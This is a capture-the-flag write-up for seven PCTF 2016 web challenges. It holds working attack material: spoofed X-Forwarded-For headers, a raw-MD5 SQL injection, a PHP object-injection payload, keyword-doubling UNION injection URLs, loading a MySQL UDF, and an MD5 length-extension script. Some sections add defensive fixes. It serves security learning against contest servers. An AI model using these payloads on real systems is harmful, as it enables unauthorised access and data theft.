PCTF 2016 Writeup: WEB Section

PCTF 2016 was more or less a practice competition: lots of challenges, many of them reused from elsewhere, and a long time window, which made it a good event for picking up new techniques. My own skills were too weak, though, so all I could do was read other people's solutions after the fact and work through them myself...

0x01 PORT 51 WEB 100

Challenge link

This one is not hard in itself, but I was on the campus network, where the source port gets rewritten as soon as the packet passes the router, so I never got it to work during the contest. Only when someone mentioned "unplug the router" did it click that I should have done it from a VPS...

sudo curl --local-port 51 web.phrack.top:32772

Got the flag (root is needed because curl has to bind a source port below 1024):

Yeah!! Here's your flag:PCTF{M45t3r_oF_CuRl}

0x02 LOCALHOST WEB 150

Challenge link

Capture the request and add an X-Forwarded-For header; that is enough to get past the restriction:

X-Forwarded-For: 127.0.0.1

Got the flag:

Yeah!! Here's your flag:PCTF{X_F0rw4rd_F0R_is_not_s3cuRe}
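The challenge's own source is not shown, so the first function below is an assumption about what it did (trust the header as sent). As an added example that is not part of the original writeup, it is paired with a check that only honours X-Forwarded-For hops appended by proxies we operate, which is the property the flag text is hinting at:

```python
# Added example, not from the writeup: spoofable X-Forwarded-For check vs. a
# version that only trusts hops written by known proxies.
import ipaddress
from typing import Iterable, Mapping


def naive_is_localhost(headers: Mapping[str, str], remote_addr: str) -> bool:
    """Vulnerable (assumed to be what the challenge did): anyone can send
    'X-Forwarded-For: 127.0.0.1' and the check believes them."""
    claimed = headers.get("X-Forwarded-For", remote_addr).split(",")[0].strip()
    return claimed == "127.0.0.1"


def client_ip(headers: Mapping[str, str], remote_addr: str,
              trusted_proxies: Iterable[str] = ()):
    """Resolve the real client address.

    If the TCP peer is not one of our proxies the header is attacker-controlled
    and ignored. Otherwise walk the hop list right-to-left, skipping our own
    proxies: each proxy APPENDS the address it saw, so anything the client
    fabricated is always to the left of the first address a proxy wrote."""
    peer = ipaddress.ip_address(remote_addr)
    trusted = {ipaddress.ip_address(p) for p in trusted_proxies}
    if peer not in trusted:
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return peer  # malformed header: do not guess, fall back to the peer
        if ip not in trusted:
            return ip
    return peer  # every hop was one of ours, or the header was empty


def hardened_is_localhost(headers: Mapping[str, str], remote_addr: str,
                          trusted_proxies: Iterable[str] = ()) -> bool:
    return client_ip(headers, remote_addr, trusted_proxies).is_loopback
```

With no proxy in front of the application the only reliable source address is the TCP peer; once a proxy is involved, the proxy itself has to be the trust anchor, never the header contents on their own.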

0x03 Login WEB 250

Challenge link

The response headers contain this hint:

Hint:"select * from `admin` where password='".md5($pass,true)."'"

A quick Google search turns up the reference article on raw MD5 in SQL.

Its payload can be used as-is:

content: 129581926211651571912466741651878684928
count:   18933549
hex:     06da5430449f8f6f23dfc1276f722738
raw:     ?T0D??o# ??'or'8.N=?

Got the flag:

Correct pass!! Your Flag: PCTF{R4w_md5_is_d4ng3rous}
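Why the payload works: `md5($pass, true)` returns the 16 raw digest bytes, which are dropped straight into a quoted literal. If those bytes happen to contain `'or'` followed by a non-zero digit, the literal closes and MySQL evaluates `OR '8...'`, which is truthy. The Python below is an added example (not the writeup's or the reference article's code) that verifies this property for the payload above and shows the brute-force loop behind the `count` line; the loop is bounded so it can actually be run, and the query string is the one from the hint with no escaping assumed.

```python
# Added example, not from the writeup: what a raw MD5 digest has to look like to
# inject into  ... where password='<raw bytes>'  and a check of the known payload.
import hashlib
import re

# Closing quote, the keyword or, an opening quote, then a non-zero digit.  The rest
# of the digest must hold no further quote or backslash, so the trailing literal
# stays well formed and MySQL casts it by its numeric prefix ('8.N=?' -> 8, truthy).
INJECT = re.compile(rb"'or'[1-9]")

KNOWN = b"129581926211651571912466741651878684928"  # payload from the reference


def raw_md5(password: bytes) -> bytes:
    return hashlib.md5(password).digest()


def is_injecting(raw: bytes) -> bool:
    return INJECT.search(raw) is not None and raw.count(b"'") == 2 and b"\\" not in raw


def build_query(raw: bytes) -> str:
    """Byte-for-byte what the PHP concatenation in the hint produces
    (latin-1 maps each byte to exactly one character)."""
    return "select * from `admin` where password='" + raw.decode("latin-1") + "'"


def search(start: int, limit: int):
    """Hash decimal strings start..start+limit-1 until one injects.  The published
    payload was found at roughly try 18.9 million, so a small limit will usually
    return None; it is here to show the loop, not to finish it."""
    for i in range(start, start + limit):
        cand = str(i).encode()
        if is_injecting(raw_md5(cand)):
            return cand
    return None
```

The fix is not to hex-encode the digest but to stop building SQL from strings at all: a prepared statement with a bound parameter, and a real password hash (`password_hash()`/`password_verify()` in PHP) instead of unsalted MD5.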

0x04 The Secret of S.H.I.E.L.D. WEB 300

Challenge link

The page is nothing but an image. In the page source the image is loaded through showimg.php with a base64 parameter that decodes to shield.jpg.
Opening that URL directly dumps the raw bytes of the file, so showimg.php is a file-read endpoint. Read the PHP sources the same way:

showimg.php: http://web.phrack.top:32779/showimg.php?img=c2hvd2ltZy5waHA=

index.php: http://web.phrack.top:32779/showimg.php?img=aW5kZXgucGhw

readfile();?>

shield.php: http://web.phrack.top:32779/showimg.php?img=c2hpZWxkLnBocA==

<?php
    class Shield {
        public $file;
        function __construct($filename) {
            $this->file = $filename;
        }
        function readfile() {
            if (!empty($this->file) && stripos($this->file,'..')===FALSE
              && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) {
                return @file_get_contents($this->file);
            }
        }
    }
?>

So the flag is in pctf.php, but a stripos() filter stands in the way of reading it through img. Instead, pass the filename through the class parameter of index.php, which is unserialized into a Shield object: its readfile() only rejects `..`, `/` and `\`, and pctf.php contains none of those. (Note that the backslash test uses `==` rather than `===`, so a backslash at offset 0 would also slip through, since `0 == FALSE`; irrelevant on Linux, but a real slip.)

To build the payload, index.php and shield.php were saved locally exactly as dumped above, and a Shield instance with file set to pctf.php was serialized and printed:

O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";}

Build the request in Burp:

GET /index.php?class=O:6:"Shield":1:{s:4:"file";s:8:"pctf.php";} HTTP/1.1
Host: web.phrack.top:32779
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36
DNT: 1
Referer: http://web.phrack.top:32779/
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4
Connection: close

Got the flag.
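Building the serialized string by hand makes the format explicit (length-prefixed fields, byte lengths, property names as plain strings for public members), which is what you need when a payload has to be adjusted without a PHP interpreter at hand. The following is an added example, not code from the writeup or the challenge; the `shield_readfile_allows()` function is a Python model of the guard in Shield::readfile() as shown above, including its `==FALSE` slip.

```python
# Added example, not from the writeup: a PHP serialize() subset sufficient for
# object-injection payloads, plus a model of the readfile() guard from shield.php.
def php_serialize(value) -> str:
    """Subset of PHP's serialize(): bool, int, str and dict (as a PHP array)."""
    if isinstance(value, bool):
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # The length is counted in BYTES, not characters; unserialize() rejects a mismatch.
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    raise TypeError(f"unsupported type: {type(value).__name__}")


def php_serialize_object(class_name: str, props: dict) -> str:
    """O:<len>:"<class>":<count>:{<name><value>...}. Public property names are plain
    strings; protected/private ones would carry a \\0*\\0 or \\0Class\\0 prefix."""
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
    return f'O:{len(class_name)}:"{class_name}":{len(props)}:{{{body}}}'


def shield_readfile_allows(filename: str) -> bool:
    """Model of the guard in Shield::readfile(). stripos() returns the match offset or
    false; the '..' and '/' tests use ===, but the backslash test uses ==, so a match at
    offset 0 compares equal to FALSE and is treated as 'not found'."""
    if filename in ("", "0"):          # PHP empty()
        return False
    low = filename.lower()
    if ".." in low or "/" in low:
        return False
    bs = low.find("\\")
    return bs == -1 or bs == 0


PAYLOAD = php_serialize_object("Shield", {"file": "pctf.php"})
```

The model confirms that a bare filename in the web root passes (the filter is a path-traversal blacklist, not an allow-list of readable files), and that a leading backslash would pass too because of the loose comparison.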

0x05 In A Mess WEB 500

Challenge link

index.phps exposes the source:

<?php
// (the echo statement preceding this point is cut off in the dump)
if(!$_GET['id']){
    header('Location: index.php?id=1');
    exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.')){
    echo 'Hahahahahaha';
    return ;
}
$data = @file_get_contents($a,'r');
if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4){
    require("flag.txt");
}else{
    print "work harder!harder!harder!";
}
?>

Three conditions to satisfy. id must be truthy (or the page redirects) yet satisfy `$id==0`: any non-numeric string such as `.` does, because PHP 5/7 casts it to 0 for the loose comparison. a must not contain a dot, which rules out filenames and URLs, so use the php://input wrapper: file_get_contents() then returns the POST body, which we set to `1112 is a nice lab!`. For b, eregi() hands its pattern to the C library as a NUL-terminated string, so a leading %00 truncates `111\0` to `111`, which matches `1114`; the first character is not `4`, and `%0012345` is 6 bytes long. Put together:

POST /index.php?id=.&a=php://input&b=%0012345 HTTP/1.1
Host: web.phrack.top:32783
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36
DNT: 1
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8,en-GB;q=0.6,en;q=0.4
Connection: close
Content-Length: 19

1112 is a nice lab!

This returns the hint for the next stage:

Come ON!!! {/^HT2mCpcvOLf}
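To see exactly which PHP quirk each parameter exploits, here is a Python model of the three checks in index.phps. It is an added example, not the challenge's code: only the php://input wrapper is modelled for file_get_contents(), and the loose-comparison rule is the PHP 5/7 one (PHP 8 compares a non-numeric string against an int as strings, so `'.' == 0` is false there and the id bypass no longer works).

```python
# Added example, not from the writeup: a model of the PHP 5/7 checks in index.phps,
# to show why id=., a=php://input with body "1112 is a nice lab!" and b=%0012345 pass.
import re

EXPECTED_BODY = "1112 is a nice lab!"


def php_truthy(s: str) -> bool:
    """PHP: the strings '' and '0' are false, every other string is true."""
    return s not in ("", "0")


def php5_loose_eq_int(s: str, n: int) -> bool:
    """PHP 5/7 `$string == $int` converts the string to a number using its leading
    numeric prefix; a string without one becomes 0, so '.' == 0 holds.
    PHP 8 casts the int to a string instead, making '.' == 0 false."""
    m = re.match(r"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?", s)
    return (float(m.group(0)) if m else 0.0) == n


def stripos_truthy(haystack: str, needle: str) -> bool:
    """`if(stripos($a,'.'))` is false both when the needle is absent (FALSE) and
    when it sits at offset 0 (0 is falsy)."""
    return haystack.lower().find(needle.lower()) > 0


def eregi_pattern(p: str) -> str:
    """eregi() passes the pattern to the C regex library as a NUL-terminated string,
    so everything from the first \\0 onwards is silently dropped."""
    return p.split("\x00", 1)[0]


def index_php(id_: str, a: str, b: str, post_body: str) -> str:
    """Returns what the script would do for these GET parameters and POST body."""
    if not php_truthy(id_):
        return "redirect index.php?id=1"
    if stripos_truthy(a, "."):
        return "Hahahahahaha"
    data = post_body if a == "php://input" else None   # other streams not modelled
    first = b[:1]
    if (data == EXPECTED_BODY
            and php5_loose_eq_int(id_, 0)
            and len(b) > 5
            and re.search(eregi_pattern("111" + first), "1114", re.IGNORECASE) is not None
            and not php5_loose_eq_int(first, 4)):
        return "flag.txt"
    return "work harder!harder!harder!"
```

The model also shows that the NUL byte is not strictly necessary: any regex metacharacter as the first byte of b, for example `b=.12345`, makes `111.` match `1114` while `substr($b,0,1)!=4` still holds.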

Visiting http://web.phrack.top:32783/%5eHT2mCpcvOLf/index.php?id=1 gives an injection point. Testing shows that some keywords and the space character are filtered; doubling the keywords (the filter strips each once) and using inline comments as separators gets around it. Payloads:

// displayed column is 3
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,3#

// database: test
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,database()#

// table: content
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(table_name)/*123*/frfromom/*111*/information_schema.tables/*111*/where/*111*/table_schema=0x74657374#

// columns: id, context, title
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(column_name)/*123*/frfromom/*111*/information_schema.columns/*111*/where/*111*/table_name=0x636F6E74656E74#

// flag:  1:PCTF{Fin4lly_U_got_i7_C0ngRatulation5}:hi666
http://web.phrack.top:32783/^HT2mCpcvOLf/index.php?id=0/*123*/uniunionon/*123*/selselectect/*123*/1,2,group_concat(id,0x3a,context,0x3a,title,0x3a)/*123*/frfromom/*111*/content#
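The reason `uniunionon` works is that a strip-once filter removes the inner `union` and leaves a fresh `union` behind, while `/*123*/` is whitespace to the SQL parser. As an added example (not the challenge's code; its real keyword list is not known, so the one below is an assumption), the first payload above is run through such a filter into an in-memory SQLite table of the same shape as the `content` table, next to a parameterised query that the same input cannot touch:

```python
# Added example, not from the writeup: a strip-once keyword filter, the union payload
# from above run through it against SQLite, and the parameterised alternative.
import re
import sqlite3

# Assumed blacklist: the challenge only revealed that some keywords and the space
# character were removed and that doubled keywords survived.
BLACKLIST = ("union", "select", "from", " ")

# The first payload from the writeup, minus the trailing '#' (a MySQL-only comment).
PAYLOAD = "0/*123*/uniunionon/*123*/selselectect/*123*/1,2,3"


def weak_filter(value: str) -> str:
    """Remove each blacklisted token once, case-insensitively.  Stripping 'union'
    from 'uniunionon' yields 'union'; /*...*/ comments replace the forbidden spaces."""
    for token in BLACKLIST:
        value = re.sub(re.escape(token), "", value, flags=re.IGNORECASE)
    return value


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for the challenge's test.content table."""
    db = sqlite3.connect(":memory:")
    db.execute("create table content (id integer, context text, title text)")
    db.execute("insert into content values (1, 'constructed flag text', 'hi')")
    return db


def vulnerable_lookup(db: sqlite3.Connection, user_id: str):
    """String concatenation behind a blacklist: the doubled keywords come out whole."""
    sql = "select id, context, title from content where id=" + weak_filter(user_id)
    return db.execute(sql).fetchall()


def safe_lookup(db: sqlite3.Connection, user_id: str):
    """Bound parameter: the value is data, never SQL, so no blacklist is needed."""
    try:
        return db.execute("select id, context, title from content where id=?",
                          (int(user_id),)).fetchall()
    except ValueError:
        return []
```

A filter that loops until the string stops changing would defeat the doubling trick, but it is still a blacklist over an attacker-controlled grammar; the parameterised query removes the problem rather than chasing it.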

0x06 RE? WEB 300

Challenge link

I had no idea how to approach this one. Going by the reference link and the provided udf.so, I guessed it was the Linux variant of loading a user-defined function into MySQL.

show variables like "%plugin%";
+---------------+------------------------+
| Variable_name | Value                  |
+---------------+------------------------+
| plugin_dir    | /usr/lib/mysql/plugin/ |
+---------------+------------------------+

Copy udf.so into /usr/lib/mysql/plugin/; opening it in IDA shows a getflag function. (CREATE FUNCTION ... SONAME only loads libraries from plugin_dir and needs the INSERT privilege on mysql.func, but the server will happily load any shared object placed there, so write access to that directory is code execution as the mysqld user.)

create function getflag returns string soname "udf.so";
select getflag();
+------------------------------------------+
| getflag()                                |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function} |
+------------------------------------------+

0x07 The flag is in the admin's hands WEB 350

Challenge link

Trying http://web.phrack.top:32785/index.phps on a whim downloads a backup file, but it is unreadable binary: a vim swap file. Rename it to .index.php.swp and let vim recover it:

vim -r index.php

This yields the source (the PHP part is not reproduced here; only the markup survived):

Web 350
    body {
        background:gray;
        text-align:center;
    }

The key line is `md5($salt.strrev($_COOKIE["role"]))`: a secret prefix followed by attacker-controlled data, hashed with MD5, which is the textbook setting for a length-extension attack. Googling it turns up reference link 1 and reference link 2.

Their script only needs small adjustments. The server hashes the reversed cookie, so the data hash_extender is given is the reversed serialized guest role, the appended data is the reversed admin role, and the extended output is reversed once more before it is sent as the cookie. The salt length is unknown and is brute-forced with -l:

# -*- coding:utf-8 -*-
from urllib.parse import urlparse, quote, unquote_to_bytes
from http.client import HTTPConnection
import os


def gao(x, y):
    # Send the forged role cookie x together with the forged hash y.
    url = "http://web.phrack.top:32785/index.php"
    cookie = "role=" + x + "; hsh=" + y
    build_header = {
        'Cookie': cookie,
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:44.0) Gecko/20100101 Firefox/44.0',
        'Host': 'web.phrack.top:32785',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    }
    urlparts = urlparse(url)
    conn = HTTPConnection(urlparts.hostname, urlparts.port or 80)
    conn.request("GET", urlparts.path, '', build_header)
    resp = conn.getresponse()
    return resp.read().decode('utf-8', 'replace')


for i in range(1000):
    print(i)
    # secret len = ???  -> try every length with -l
    # -d: the data the server hashed after the salt, i.e. strrev('s:5:"guest";')
    # -s: the hsh cookie the server issued for that data
    # -a: what to append, i.e. strrev('s:5:"admin";')
    find_hash = ("./hash_extender -d ';\"tseug\":5:s' -s 3a4727d57463f122833d9e732f94e4e0 -f md5"
                 "  -a ';\"nimda\":5:s' --out-data-format=html -l " + str(i) + " --quiet")
    calc_res = os.popen(find_hash).readlines()
    line = calc_res[0].strip()
    hash_value = line[:32]
    attack_padding = line[32:]
    # Reverse the extended data so the server's strrev() restores it, then
    # re-encode the raw bytes for the Cookie header.
    attack_padding = quote(unquote_to_bytes(attack_padding)[::-1])
    ret = gao(attack_padding, hash_value)
    if "Welcome" in ret:
        print(ret)
        break

Got the flag:

Web 350
    body {
        background:gray;
        text-align:center;
    }
    ### Welcome Admin. Your flag is PCTF{H45h_ext3ndeR_i5_easy_to_us3}

Tags: hacker, ctf
